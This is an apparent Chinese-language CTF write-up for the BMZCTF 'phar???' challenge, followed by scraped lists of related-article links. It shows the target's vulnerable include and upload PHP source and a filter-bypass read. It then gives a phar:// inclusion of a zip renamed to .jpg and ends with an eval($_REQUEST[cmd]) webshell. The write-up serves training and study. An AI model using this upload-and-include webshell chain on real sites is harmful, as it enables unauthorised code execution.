pchar???
补充知识点

开始这题之前我们先补充一个知识点

phar 的文件包含 和上面类似先创建一个phar 标准包,使用 PharData 来创建,然后添加文件进去phar里面。 然后在文件包含的函数里面 可控的话 ,使用phar://xxxx/xxx 就可以实现文件包含了

解题

进入题目查看源码发现一个界面我们去访问看一下

然后我们在include.php中查看源码又发现一个页面upload.php

两个页面访问结果如下

估计是通过upload.php上传的内容然后通过include.php包含进来,我们先来试试文件包含

基本确定是文件包含了但是他会在你输入的文件名后面+.php

既然这样那我们尝试使用php://filter/协议读取源码试试

  1. include.php?file=php://filter/convert.base64-encode/resource=include

将源码读出我们进行base64解码得到如下源码

  1. <html>
  2. Tips: the parameter is file! :)
  3. <!-- upload.php -->
  4. </html>
  5. <?php
  6.     @$file = $_GET["file"];
  7.     if(isset($file))
  8.     {
  9.         if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
  10.         {
  11.             echo "<p> error! </p>";
  12.         }
  13.         else
  14.         {
  15.             include($file.'.php');
  16.         }
  17.     }
  18. ?>

这里发现过滤掉了http,data,ftp,input,%00,..并且长度不能大于70

然后我们再去读一下upload.php

  1. <form action="" enctype="multipart/form-data" method="post"
  2. name="upload">file:<input type="file" name="file" /><br>
  3. <input type="submit" value="upload" /></form>
  4.  
  5. <?php
  6. if(!empty($_FILES["file"]))
  7. {
  8.     echo $_FILES["file"];
  9.     $allowedExts = array("gif", "jpeg", "jpg", "png");
  10.     @$temp = explode(".", $_FILES["file"]["name"]);
  11.     $extension = end($temp);
  12.     if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
  13.     || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
  14.     || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
  15.     && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
  16.     {
  17.         move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
  18.         echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
  19.     }
  20.     else
  21.     {
  22.         echo "upload failed!";
  23.     }
  24. }
  25. ?>

这里采用白名单过滤的方法进行文件上传再根据题目名称为phar我们来试试

首先我们写一个

  1. <?php phpinfo();?>

然后我们将这个php文件压缩成zip的压缩包

之后将zip压缩包的后缀改为.jpg然后进行上传

上传成功然后我们使用phar进行文件包含

  1. http://www.bmzclub.cn:23627/include.php?file=phar://upload/1.jpg/1

成功执行下面我们将phpinfo改为木马即可

  1. <?php    echo "hack!";    eval($_REQUEST[cmd]);?>

上传成功,下面我们使用hackbar执行指令即可

BMZCTF phar???的更多相关文章

  1. PHP的学习--使用phar打包

    前段时间写了几个PHP的脚本,但是因为脚本的项目是基于composer安装的,给别人使用的时候不太方便,就希望能够打包成一个能直接使用的文件. 搜索了一下,发现可以使用phar打包. 假设我们有如下一 ...

  2. phar文件的使用

    1.用php命令行 php phar文件 2.生成bat文件,在命令行下使用,以composer.phar为例 ( 1)在php.exe所在目录新建composer.bat文件 (2)把compose ...

  3. 使用phar上线你的代码包

    在我前一阵子写的一篇文章<新版 SegmentFault 重构之系统架构>中,很多人对其中提到的利用phar上线代码比较感兴趣,我就在这边跟大家分享下我目前的做法. 哪些项目适合phar打 ...

  4. PHP中phar包的使用

    PHP5.3之后支持了类似Java的jar包,名为phar.用来将多个PHP文件打包为一个文件. 首先需要修改php.ini配置将phar的readonly关闭,默认是不能写phar包的,includ ...

  5. Yii2框架打包成Phar包报错的经历

    以yii2为例 打包文件过程比较简单,但打包好以后简单测试yii命令,一直报错: PHP Fatal error: Uncaught yii\base\InvalidParamException: T ...

  6. Phar与Composer

    如果你想把PHP玩出像Java那样的花来,那Phar.Composer甚至Phing应该都是必须要玩一遍的. Phar - Php Archive.包管理器,有些类似Java中的jar包,但有所不同. ...

  7. Phar文件

    phar 扩展名文件提供了一种将整个PHP应用程序打包放入一个被称之为phar(PHP archive)的文件从而更加容易便利地发布和安装的方法.就像是java的jar文件有点类似.除了这个功能外,P ...

  8. 简单使用 PHP Phar 打包php代码 笔记

    Phar简介:Phar 归档的概念来自 Java™ 技术的 JAR 归档,它允许使用单个文件打包应用程序,这个文件中包含运行应用程序所需的所有东西.该文件不同于单个可执行文件,后者通常由编程语言生成, ...

  9. Could not open input file: composer.phar

    Yii 2官网推荐用Composer安装框架,但是在本地出错:Could not open input file: composer.phar.后来修改了命令行就ok了,难道是我装的Composer跟 ...

随机推荐

  1. 【windows 访问控制】七、window 访问控制编辑器(Access Control Editor)

    window 访问控制编辑器(Access Control Editor) 右键(文件.目录.程序)>选择属性>安全>高级   进入访问控制编辑器

  2. 2、CPU是怎么实现运算的 ?

    我先来了解一下芯片构造,芯片由晶体管组成的.晶体管组成逻辑运算与或非电路. P型半导体的"P"表示正电的意思,取自英文Positive的第一个字母. N型半导体的"N&q ...

  3. 数据结构与算法入门系列教程-C#

    数据结构与算法入门系列教程 (一)为啥要学习数据结构与算法 曾经我也以为自己很牛逼,工作中同事也觉得我还可以,领导也看得起我,啥啥啥都好,就这样过了几年,忽然发现自己学新东西没劲.时代都变了,而我还只 ...

  4. Linux下忘记MySQL密码的解决办法

    一.使用免密码登录 1.使用 #find / -name my.cfg 找到mysql配置文件 2.vim /etc/mysql/my.cfg (我的配置文件是这个路径,每个人的路径可能有所不同,用f ...

  5. Atcoder 229

    Atcoder 229 \(D.\)Longest X 题意 给定一个长度为\(N\)的字符串\(S\),\(S\)中包含$\ .\ \(和\)\ X\ \(两种字符,现在你可以将其中\)K\(个\) ...

  6. 【实测】Python 和 C++ 下字符串查找的速度对比

    完整格式链接:https://blog.imakiseki.cf/2022/03/07/techdev/python-cpp-string-find-perf-test/ 背景 最近在备战一场算法竞赛 ...

  7. LeetCode-019-删除链表的倒数第 N 个结点

    删除链表的倒数第 N 个结点 题目描述:给你一个链表,删除链表的倒数第 n 个结点,并且返回链表的头结点. 进阶:你能尝试使用一趟扫描实现吗? 示例说明请见LeetCode官网. 来源:力扣(Leet ...

  8. LGP3281口胡

    当你看到一个东西的时候,GF 有可能比 DP 更方便.处理贡献也有可能比 DP 更方便. 这个题意明显是让我们计算 \(S(r)-S(l-1)\) 之类的东西( 所以直接考虑前缀的答案就好了( 考虑将 ...

  9. Keras速查_CPU和GPU的mnist预测训练_模型导出_模型导入再预测_导出onnx并预测

    需要做点什么 方便广大烟酒生研究生.人工智障炼丹师算法工程师快速使用keras,所以特写此文章,默认使用者已有基本的深度学习概念.数据集概念. 系统环境 python 3.7.4 tensorflow ...

  10. Seata XA 模式示例分析

    @ 目录 1 下载示例 2 示例结构 3 业务服务 business-xa 3.1 模块结构 3.2 Controller 层 3.3 Service 层 3.4 stock Feign 客户端 3. ...